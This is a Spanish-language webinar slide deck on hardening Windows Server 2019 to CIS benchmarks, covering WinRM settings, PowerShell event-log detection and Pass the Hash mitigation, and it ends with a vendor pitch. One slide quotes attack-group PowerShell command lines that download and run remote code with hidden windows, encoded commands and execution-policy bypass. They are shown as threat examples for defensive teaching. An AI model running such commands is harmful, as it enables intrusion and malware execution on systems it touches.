SlideShare ist ein Scribd-Unternehmen logo
1 von 31
Downloaden Sie, um offline zu lesen
Windows 2019 Hardening
Garantice el cumplimiento de CIS y
evite interrupciones en la producción
Eduardo Rivero
Gerente de Consultoría y Servicios
de Seguridad
Jerry Ludmir
CEO, CalCom Software
Dvir Goren
CTO, CalCom Software
Eduardo Rivero
Gerente de Consultoría y Servicios, Securesoft
• Gerente Regional de consultoría y servicios
especializados con más de 17 años de experiencia en
tecnología y seguridad de la información.
• Líder QA de proyectos consultivos de ciberseguridad, y
gestión de respuesta ante incidentes.
• Experto en estándares y normativas de seguridad a
nivel global: ISO 27001/9001, COBIT, SANS, ENISA, PCI,
entre otros.
• Certificado como CRISC, CBCP, LCSPC, SFPC en el rubro.
• En su trayectoria, ha liderado más de 150 proyectos
consultivos de ciberseguridad en los últimos 07 años
Jerry Ludmir
CEO, CalCom
• Veterano de la industria de TI, con mas
de 30 años de experiencia en la
industria
• Emprendedor y fundador de grandes
empresas en la industria de TI
• Fundó Calcom hace 15 años
manteniéndose en su rol de liderazgo
Dvir Goren
CTO, CalCom
• Veterano de la industria de TI con mas de 25 años de
experiencia en la industria
• Líder de opinión en el campo del aseguramiento de servidores
con más de 13 años de gestión de proyectos complejos de
fortalecimiento
• Consultor de las organizaciones de seguridad nacional en el
tema del aseguramiento de servidores
• Lidera el equipo de productos de CalCom durante los últimos
15 años, desarrollando la estrategia y roadmap del producto
Introducción
• CalCom ofrece soluciones de automatización
para el proceso de aseguramiento en equipos de
seguridad y TI.
• Apoyando grandes organizaciones para lograr el
aseguramiento de su infraestructura por mas de
15 años.
• Hacemos felices tanto a equipos de seguridad
como de TI!
Agenda
• Aseguramiento de Servidores – ¿Qué es?
¿Porqué es importante?
• Proceso Manual de Aseguramiento
• Esquemas de Cumplimiento – Acercándonos al
benchmark de CIS
• Escenarios de aseguramiento - lab
• Introducción al enfoque de automatización de
aseguramiento de Calcom
Aseguramiento de Servidores – ¿Qué es? ¿Porqué?
• Mejora de la seguridad del servidor a través de una variedad de cambios en la
configuración para reducir la superficie de ataque
• Cumplimiento/auditoría: PCI, FDIC, ciber regulaciones gubernamentales, NIST 800-53
• Prácticas recomendadas de seguridad: eliminación de vulnerabilidades críticas
Servicios Asegurar Ataques
SMBv1 Wannacry
RDP Bluekeep, Dejablue, Ryuk
TLS POODLE
NTLM MTLM Relay
Proceso Manual de Aseguramiento
Definir la
política
• Colaboración y aprobación de seguridad, TI, gerencia, auditoría
• Granularidad de políticas: por función del servidor, versión del sistema
operativo, etc.
• Política basada en puntos de referencia conocidos
Prueba de
Laboratorio
• Simular la producción en un entorno de prueba.
• Realizar pruebas para evitar interrumpir la producción.
Asegurando
el Servidor
• Asegurar los entornos de prueba y pre-producción antes de pasar a
producción
• Fortalecimiento del entorno de producción: ¿cómo? (GPO, manualmente,
herramientas)
Benchmarks de Cumplimiento - CIS Benchmarks
• Documento de casi 1,000 páginas
• Más de 400 recomendaciones de
aseguramiento
Benchmarks de Cumplimiento - CIS Benchmarks
ESCENARIOS
de
ASEGURAMIENTO
Escenario #1: Ataque Malicioso via PowerShell remoto
PowerShell Como Plataforma de Ataque
• Ataques maliciosos con PowerShell crecieron 661% en
2019*
• PowerShell está en todos lados: plataformas de
sistemas operativos, protocolos, aplicaciones, nube etc.
• Interface con .NET y APIs de Windows
• CMD.exe está normalmente bloqueado, pero no
PowerShell
• Ejecuta código en memoria sin tocar el disco
• Descarga y ejecuta código desde otro sistema (Remote
execution attack)
• Una vez el intruso tiene acceso, todas las herramientas
estándar del sistema operativo le están disponibles
• Ataques mas famosos son Petya y NotPetya
*Symantec security Center
Attack groups Script invocations
Pupa/ DeepPanda powershell.exe -w hidden -nologo -nointeractive -nop -ep bypass -c “IEX ((new-object
net.webclient). downloadstring([REMOVED]))”
Pupa/ DeepPanda powershell.exe -Win hidden -Enc [REMOVED]
Pupa/ DeepPanda powershell -noprofile -windowstyle hidden -noninteractive -encodedcommand [REMOVED]
SeaDuke powershell -executionpolicy bypass -File diag3.ps1
SeaDuke powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain [REMOVED] -User [REMOVED] -
Password [REMOVED] -Mailbox
CozyDuke powershell.exe -WindowStyle hidden -encodedCommand [REMOVED]
Odinaff powershell.exe -NoP -NonI -W Hidden -Enc [REMOVED]
Buckeye powershell.exe -w 1 cls (New-Object Net.WebClient).DownloadFile(“””http://[REMOVED]/
images/rec.exe”””,”””$env:tmprec.exe”””);Iex %tmp%rec.exe
Ejemplos de script usados en ataques dirigidos
• Estos ataques son muy difíciles de detectar por los
equipos de ciberseguridad
• Se ven como actividad normal de usuarios
Escenario #1: Ataque Malicioso via PowerShell remoto
Setting: Name Category
Default
Value
2016
CIS 2016
CIS Control
Level (2016)
CIS Control ##
(2016)
Default Value 2019 CIS MS2019
CIS Control
Level (2019)
CIS Control #
(2019)
Allow Basic authentication
WinRM
Client
Disabled L1 18.9.97.1.1
Disabled. (The WinRM client does not use
Basic authentication.)
Disabled L1 18.9.97.1.1
Allow unencrypted traffic
WinRM
Client
Disabled L1 18.9.97.1.2
Disabled. (The WinRM client sends or receives
only encrypted messages over the network.)
Disabled L1 18.9.97.1.2
Disallow Digest authentication
WinRM
Client
Enabled L1 18.9.97.1.3
Disabled. (The WinRM client will use Digest
authentication.)
Enabled L1 18.9.97.1.3
Allow Basic authentication
WinRM
Service
Disabled L1 18.9.97.2.1
Disabled. (The WinRM service will not accept
Basic authentication from a remote client.)
Disabled L1 18.9.97.2.1
Allow remote server management
through WinRM
WinRM
Service
Disabled L2 18.9.97.2.2
Disabled. (The WinRM service will not respond
to requests from a remote computer,
regardless of whether or not any WinRM
listeners are configured.)
Disabled L2 18.9.97.2.2
Allow unencrypted traffic
WinRM
Service
Disabled L1 18.9.97.2.3
Disabled. (The WinRM service sends or
receives only encrypted messages over the
network.)
Disabled L1 18.9.97.2.3
Disallow WinRM from storing RunAs
credentials
WinRM
Service
Enabled L1 18.9.97.2.4
Disabled. (The WinRM service will allow the
RunAsUser and RunAsPassword configuration
values to be set for plug-ins and the
RunAsPassword value will be stored securely.)
Enabled L1 18.9.97.2.4
Allow Remote Shell Access
Windows
Remote Shell
Disabled L2 18.9.98.1
Enabled. (New Remote Shell connections are
allowed.)
Disabled L2 18.9.98.1
Escenario #1: Ataque Malicioso via PowerShell remoto
Recomendaciones de CIS
18.9.97.2.2 (L2) Ensure 'Allow remote server management through WinRM' is set to 'Disabled' (Scored)
• GPO: Computer ConfigurationAdministrative TemplatesWindows ComponentsWindows Remote Management (WinRM)WinRM
ServiceAllow remote server management through WinRM
• Reg: HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWinRMServiceAllowAutoConfig
Nota:
• Según CIS no hay impacto en el servidor porque es el comportamientos por defecto
• Es correcto solo para servidores recién instalados pero no considera las actividades
administrativas posteriores en el ambiente
Escenario #1: Ataque Malicioso via PowerShell remoto
Ejemplo de Comandos:
Escenario #1: Ataque Malicioso via PowerShell remoto
Ejemplos de Comandos:
Invoke-Command -ComputerName win2016iis -Credential chslabdave -ScriptBlock { Get-Culture}
Escenario #1: Ataque Malicioso via PowerShell remoto
Buscar en el log de eventos – event id 600:
Nota:
HostApplication=C:Wind
owssystem32wsmprov
host.exe -Embedding
El host de PowerShell
wsmprovhost.exe es un
proceso proxy ejecutado de
forma remota a través de
PowerShell cuando se usa la
Administración Remota de
Windows (WinRM)
Escenario #1: Ataque Malicioso via PowerShell remoto
• Pass the Hash es una técnica de ataque que permite a un atacante autenticarse en
un servidor o servicio remoto mediante el uso del hash NTLM o LM de la contraseña
de un usuario.
• Reemplaza la necesidad de robar la contraseña de texto sencillo
• Proceso de ataque:
• Obtiene el hash del nombre de usuario y su contraseña
• Usa el hash (o contraseña) para autenticar el servidor remoto
• Usa LM o NTLM
• No es necesario aplicar fuerza bruta a los hash para obtener el texto de la contraseña sin cifrar
• Debilidad: en el protocolo de autenticación, donde el hash de la contraseña
permanece estático de una sesión a otra hasta que la contraseña se cambie .
• Se puede realizar contra cualquier servidor o servicio que acepte autenticación LM o
NTLM (Windows, Unix o cualquier otro sistema operativo).
Escenario #2: Ataque Pass the Hash
2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and credentials for network
authentication' is set to 'Enabled' (Scored)
• GPO: Computer ConfigurationPoliciesWindows SettingsSecurity SettingsLocal PoliciesSecurity
OptionsNetwork access: Do not allow storage of passwords and credentials for network
authentication
• Reg: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa:DisableDomainCreds
Escenario #2: Ataque Pass the Hash:
Recomendaciones CIS
Escenario #2: Ataque Pass the Hash:
Recomendaciones CIS
2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and
credentials for network authentication' is set to 'Enabled' (Scored)
Escenario #2: Ataque Pass the Hash:
Recomendaciones CIS
Automatización es esencial. Veamos como se puede hacer…
CHS – El Proceso de Aseguramiento
MODO APRENDIZAJE
Simula el impacto de la
política en el ambiente de
producción
MODO APLICACIÓN
Aplica las políticas que
endurecen cada servidor
individualmente
MODO MONITOREO
Protege y controla el acceso
en tiempo real
CHS de Calcom
• Automatiza el proceso de prueba de
políticas.
• Realiza un análisis de impacto de
políticas directamente en el ambiente
de producción
• Aplica una política granular por
servidor / versión / rol
• Garantiza el cumplimiento continuo
Contacte a CalCom
Estamos aquí para ayudarlos con su proyecto de
aseguramiento!
Contáctenos vía:
Email:
info@calcomsoftware.com
Página web de CalCom:
www.calcomsoftware.com
Q&A
Use la función de Q&A de Zoom
Escribanos también por el chat

Weitere ähnliche Inhalte

Was ist angesagt?

Configuración servidores DCHP, DNS y HTTP - Cisco Packet Tracer
Configuración servidores DCHP, DNS y HTTP - Cisco Packet TracerConfiguración servidores DCHP, DNS y HTTP - Cisco Packet Tracer
Configuración servidores DCHP, DNS y HTTP - Cisco Packet TracerŘỉgö VẻGầ
 
Linux Servidor Proxy(squid)
Linux Servidor Proxy(squid)Linux Servidor Proxy(squid)
Linux Servidor Proxy(squid)elliando dias
 
Sistemas Distribuidos basados en la Web
Sistemas Distribuidos basados en la WebSistemas Distribuidos basados en la Web
Sistemas Distribuidos basados en la WebTensor
 
Projetos Estruturados de Redes - Parte 5
Projetos Estruturados de Redes - Parte 5Projetos Estruturados de Redes - Parte 5
Projetos Estruturados de Redes - Parte 5José Wagner Bungart
 
258420 projeto-de-rede-local
258420 projeto-de-rede-local258420 projeto-de-rede-local
258420 projeto-de-rede-localCezar Ceretta
 
Caracteristicas de un vtp
Caracteristicas de un vtpCaracteristicas de un vtp
Caracteristicas de un vtpErika Vazquez
 
Projeto final instalação e configuração de redes locais
Projeto final  instalação e configuração de redes locaisProjeto final  instalação e configuração de redes locais
Projeto final instalação e configuração de redes locaisMarcoSoaresGI
 
Configuración General servicios de Red windows Server
Configuración General servicios de Red windows ServerConfiguración General servicios de Red windows Server
Configuración General servicios de Red windows Serverramirocalderon516
 
Capitulo 7 ri_pv2
Capitulo 7 ri_pv2Capitulo 7 ri_pv2
Capitulo 7 ri_pv2TeleredUSM
 
Middleware en los sistemas distribuidos
Middleware en los sistemas distribuidosMiddleware en los sistemas distribuidos
Middleware en los sistemas distribuidosJC Alca Arequi
 
Principios Guías y Reglas
Principios Guías y ReglasPrincipios Guías y Reglas
Principios Guías y Reglasgcaicedo
 
Arquitectura servidores
Arquitectura servidoresArquitectura servidores
Arquitectura servidoresrulo182
 
Servicio de enrutamiento y acceso remoto
Servicio de enrutamiento y acceso remotoServicio de enrutamiento y acceso remoto
Servicio de enrutamiento y acceso remotoDaniel Gvtierrex
 
Approbation
ApprobationApprobation
Approbationmedfaye
 
Unidad 14 - SAMBA, NFS y LDAP
Unidad 14 - SAMBA, NFS y LDAPUnidad 14 - SAMBA, NFS y LDAP
Unidad 14 - SAMBA, NFS y LDAPvverdu
 

Was ist angesagt? (20)

Configuración servidores DCHP, DNS y HTTP - Cisco Packet Tracer
Configuración servidores DCHP, DNS y HTTP - Cisco Packet TracerConfiguración servidores DCHP, DNS y HTTP - Cisco Packet Tracer
Configuración servidores DCHP, DNS y HTTP - Cisco Packet Tracer
 
Linux Servidor Proxy(squid)
Linux Servidor Proxy(squid)Linux Servidor Proxy(squid)
Linux Servidor Proxy(squid)
 
Sistemas Distribuidos basados en la Web
Sistemas Distribuidos basados en la WebSistemas Distribuidos basados en la Web
Sistemas Distribuidos basados en la Web
 
Projetos Estruturados de Redes - Parte 5
Projetos Estruturados de Redes - Parte 5Projetos Estruturados de Redes - Parte 5
Projetos Estruturados de Redes - Parte 5
 
Mini Curso - Redes de Computadores
Mini Curso - Redes de ComputadoresMini Curso - Redes de Computadores
Mini Curso - Redes de Computadores
 
258420 projeto-de-rede-local
258420 projeto-de-rede-local258420 projeto-de-rede-local
258420 projeto-de-rede-local
 
Caracteristicas de un vtp
Caracteristicas de un vtpCaracteristicas de un vtp
Caracteristicas de un vtp
 
Projeto final instalação e configuração de redes locais
Projeto final  instalação e configuração de redes locaisProjeto final  instalação e configuração de redes locais
Projeto final instalação e configuração de redes locais
 
Configuración General servicios de Red windows Server
Configuración General servicios de Red windows ServerConfiguración General servicios de Red windows Server
Configuración General servicios de Red windows Server
 
Instalação de rede
Instalação de redeInstalação de rede
Instalação de rede
 
Servidor dns
Servidor dnsServidor dns
Servidor dns
 
Capitulo 7 ri_pv2
Capitulo 7 ri_pv2Capitulo 7 ri_pv2
Capitulo 7 ri_pv2
 
Middleware en los sistemas distribuidos
Middleware en los sistemas distribuidosMiddleware en los sistemas distribuidos
Middleware en los sistemas distribuidos
 
Principios Guías y Reglas
Principios Guías y ReglasPrincipios Guías y Reglas
Principios Guías y Reglas
 
Arquitectura servidores
Arquitectura servidoresArquitectura servidores
Arquitectura servidores
 
Servicio de enrutamiento y acceso remoto
Servicio de enrutamiento y acceso remotoServicio de enrutamiento y acceso remoto
Servicio de enrutamiento y acceso remoto
 
Approbation
ApprobationApprobation
Approbation
 
49778140 projeto-de-rede
49778140 projeto-de-rede49778140 projeto-de-rede
49778140 projeto-de-rede
 
Unidad 14 - SAMBA, NFS y LDAP
Unidad 14 - SAMBA, NFS y LDAPUnidad 14 - SAMBA, NFS y LDAP
Unidad 14 - SAMBA, NFS y LDAP
 
Telnet
TelnetTelnet
Telnet
 

Ähnlich wie WINDOWS 2019 HARDENING (Aseguramiento)

Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000teddy666
 
Microsoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 IMicrosoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 Iteddy666
 
Seguridad en Servidores Dedicados
Seguridad en Servidores DedicadosSeguridad en Servidores Dedicados
Seguridad en Servidores DedicadosNominalia
 
Seguridad de los dispositivos de red
Seguridad de los dispositivos de redSeguridad de los dispositivos de red
Seguridad de los dispositivos de redCarlitos Alvarado
 
Connection broker thinclient-seguridad (ii)
Connection broker thinclient-seguridad (ii)Connection broker thinclient-seguridad (ii)
Connection broker thinclient-seguridad (ii)Omega Peripherals
 
Ccna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesCcna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesJavier H
 
Seguridad en sistemas distribuidos
Seguridad en sistemas distribuidosSeguridad en sistemas distribuidos
Seguridad en sistemas distribuidosTensor
 
Servidores web de altas prestaciones. Tema 6
Servidores web de altas prestaciones. Tema 6Servidores web de altas prestaciones. Tema 6
Servidores web de altas prestaciones. Tema 6pacvslideshare
 
Ssh, registro de acceso remoto y backup
Ssh, registro de acceso remoto y backupSsh, registro de acceso remoto y backup
Ssh, registro de acceso remoto y backupmatateshion
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Windows Server Tech Day Longhorn
Windows Server Tech Day   LonghornWindows Server Tech Day   Longhorn
Windows Server Tech Day LonghornDOMINICUS
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ipTensor
 
Implementing network security_es
Implementing network security_esImplementing network security_es
Implementing network security_esJazminmrodenas
 
Portafolio de servicios Gerencia Tecnológica.pptx
Portafolio de servicios Gerencia Tecnológica.pptxPortafolio de servicios Gerencia Tecnológica.pptx
Portafolio de servicios Gerencia Tecnológica.pptxGrupoInnsumoda
 

Ähnlich wie WINDOWS 2019 HARDENING (Aseguramiento) (20)

Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000Microsoft Windows Server 2003 Y Windows 2000
Microsoft Windows Server 2003 Y Windows 2000
 
Microsoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 IMicrosoft Windows Server 2003 Y Windows 2000 I
Microsoft Windows Server 2003 Y Windows 2000 I
 
Seguridad en Servidores Dedicados
Seguridad en Servidores DedicadosSeguridad en Servidores Dedicados
Seguridad en Servidores Dedicados
 
Seguridad de los dispositivos de red
Seguridad de los dispositivos de redSeguridad de los dispositivos de red
Seguridad de los dispositivos de red
 
Hardening windows
Hardening windowsHardening windows
Hardening windows
 
Connection broker thinclient-seguridad (ii)
Connection broker thinclient-seguridad (ii)Connection broker thinclient-seguridad (ii)
Connection broker thinclient-seguridad (ii)
 
Ccna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devicesCcna security-ch2-securing-network-devices
Ccna security-ch2-securing-network-devices
 
Seguridad en sistemas distribuidos
Seguridad en sistemas distribuidosSeguridad en sistemas distribuidos
Seguridad en sistemas distribuidos
 
Servidores web de altas prestaciones. Tema 6
Servidores web de altas prestaciones. Tema 6Servidores web de altas prestaciones. Tema 6
Servidores web de altas prestaciones. Tema 6
 
Seguridad
SeguridadSeguridad
Seguridad
 
Ssh, registro de acceso remoto y backup
Ssh, registro de acceso remoto y backupSsh, registro de acceso remoto y backup
Ssh, registro de acceso remoto y backup
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Windows Server Tech Day Longhorn
Windows Server Tech Day   LonghornWindows Server Tech Day   Longhorn
Windows Server Tech Day Longhorn
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Seguridad en redes ip
Seguridad en redes ipSeguridad en redes ip
Seguridad en redes ip
 
Implementing network security_es
Implementing network security_esImplementing network security_es
Implementing network security_es
 
Portafolio de servicios Gerencia Tecnológica.pptx
Portafolio de servicios Gerencia Tecnológica.pptxPortafolio de servicios Gerencia Tecnológica.pptx
Portafolio de servicios Gerencia Tecnológica.pptx
 

Mehr von Cristian Garcia G.

Making App Security and Delivery Ridiculously Easy
Making App Security and Delivery Ridiculously EasyMaking App Security and Delivery Ridiculously Easy
Making App Security and Delivery Ridiculously EasyCristian Garcia G.
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCristian Garcia G.
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadCristian Garcia G.
 
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio. Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio. Cristian Garcia G.
 
Ciberseguridad en el mundo de la IA
Ciberseguridad en el mundo de la IACiberseguridad en el mundo de la IA
Ciberseguridad en el mundo de la IACristian Garcia G.
 
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)Cristian Garcia G.
 
Protección de los datos en la era Post-Datacenter
Protección de los datos en la era Post-DatacenterProtección de los datos en la era Post-Datacenter
Protección de los datos en la era Post-DatacenterCristian Garcia G.
 
La Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
La Ciberseguridad como pilar fundamental del Desarrollo TecnológicoLa Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
La Ciberseguridad como pilar fundamental del Desarrollo TecnológicoCristian Garcia G.
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Cristian Garcia G.
 
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...Cristian Garcia G.
 
Un enfoque práctico para implementar confianza cero en el trabajo híbrido
Un enfoque práctico para implementar confianza cero en el trabajo híbridoUn enfoque práctico para implementar confianza cero en el trabajo híbrido
Un enfoque práctico para implementar confianza cero en el trabajo híbridoCristian Garcia G.
 
La crisis de identidad que se avecina
La crisis de identidad que se avecinaLa crisis de identidad que se avecina
La crisis de identidad que se avecinaCristian Garcia G.
 
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxitoSimplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxitoCristian Garcia G.
 
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...Cristian Garcia G.
 
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOCStay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOCCristian Garcia G.
 
La evolución de IBM Qradar Suite
La evolución de IBM Qradar SuiteLa evolución de IBM Qradar Suite
La evolución de IBM Qradar SuiteCristian Garcia G.
 
Ciberseguridad en GTD, SecureSoft en GTD
Ciberseguridad en GTD, SecureSoft en GTD Ciberseguridad en GTD, SecureSoft en GTD
Ciberseguridad en GTD, SecureSoft en GTD Cristian Garcia G.
 
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...Cristian Garcia G.
 

Mehr von Cristian Garcia G. (20)

Making App Security and Delivery Ridiculously Easy
Making App Security and Delivery Ridiculously EasyMaking App Security and Delivery Ridiculously Easy
Making App Security and Delivery Ridiculously Easy
 
Ciberseguridad Alineada al Negocio
Ciberseguridad Alineada al NegocioCiberseguridad Alineada al Negocio
Ciberseguridad Alineada al Negocio
 
Reducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridadReducción efectiva del riesgo de ciberseguridad
Reducción efectiva del riesgo de ciberseguridad
 
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio. Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
Operación Segura : SOC y alineación del riesgo con el impacto para el negocio.
 
Ciberseguridad en el mundo de la IA
Ciberseguridad en el mundo de la IACiberseguridad en el mundo de la IA
Ciberseguridad en el mundo de la IA
 
Symantec Enterprise Cloud
Symantec Enterprise CloudSymantec Enterprise Cloud
Symantec Enterprise Cloud
 
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
Optimización en la detección de amenazas utilizando analítica (IA/UEBA)
 
Protección de los datos en la era Post-Datacenter
Protección de los datos en la era Post-DatacenterProtección de los datos en la era Post-Datacenter
Protección de los datos en la era Post-Datacenter
 
La Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
La Ciberseguridad como pilar fundamental del Desarrollo TecnológicoLa Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
La Ciberseguridad como pilar fundamental del Desarrollo Tecnológico
 
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
Simplificando la seguridad en entornos de nube híbridos con el Security Fabri...
 
Gestión de la Exposición
Gestión de la ExposiciónGestión de la Exposición
Gestión de la Exposición
 
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
Cómo la gestión de privilegios puede blindar su negocio contra ransomware y o...
 
Un enfoque práctico para implementar confianza cero en el trabajo híbrido
Un enfoque práctico para implementar confianza cero en el trabajo híbridoUn enfoque práctico para implementar confianza cero en el trabajo híbrido
Un enfoque práctico para implementar confianza cero en el trabajo híbrido
 
La crisis de identidad que se avecina
La crisis de identidad que se avecinaLa crisis de identidad que se avecina
La crisis de identidad que se avecina
 
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxitoSimplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
Simplifica y Vencerás : La seguridad debe ser simple para garantizar el éxito
 
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
Porqué enfocarnos en el DEX (Experiencia Digital del Empleado) - Cómo la tecn...
 
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOCStay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
 
La evolución de IBM Qradar Suite
La evolución de IBM Qradar SuiteLa evolución de IBM Qradar Suite
La evolución de IBM Qradar Suite
 
Ciberseguridad en GTD, SecureSoft en GTD
Ciberseguridad en GTD, SecureSoft en GTD Ciberseguridad en GTD, SecureSoft en GTD
Ciberseguridad en GTD, SecureSoft en GTD
 
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
Time is Money… and More.- Nuestras Capacidades Regionales de Detección y Resp...
 

Kürzlich hochgeladen

investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIhmpuellon
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxFederico Castellari
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21mariacbr99
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanamcerpam
 
Generaciones de las Computadoras..pdf...
Generaciones de las Computadoras..pdf...Generaciones de las Computadoras..pdf...
Generaciones de las Computadoras..pdf...solanocortezluisalfr
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...JohnRamos830530
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estossgonzalezp1
 
infor expo AVANCES TECNOLOGICOS DEL SIGLO 21.pptx
infor expo AVANCES TECNOLOGICOS DEL SIGLO 21.pptxinfor expo AVANCES TECNOLOGICOS DEL SIGLO 21.pptx
infor expo AVANCES TECNOLOGICOS DEL SIGLO 21.pptxgustavovasquezv56
 
presentacion_desamblado_de_una_computadora_base_a_las_normas_de_seguridad.pdf
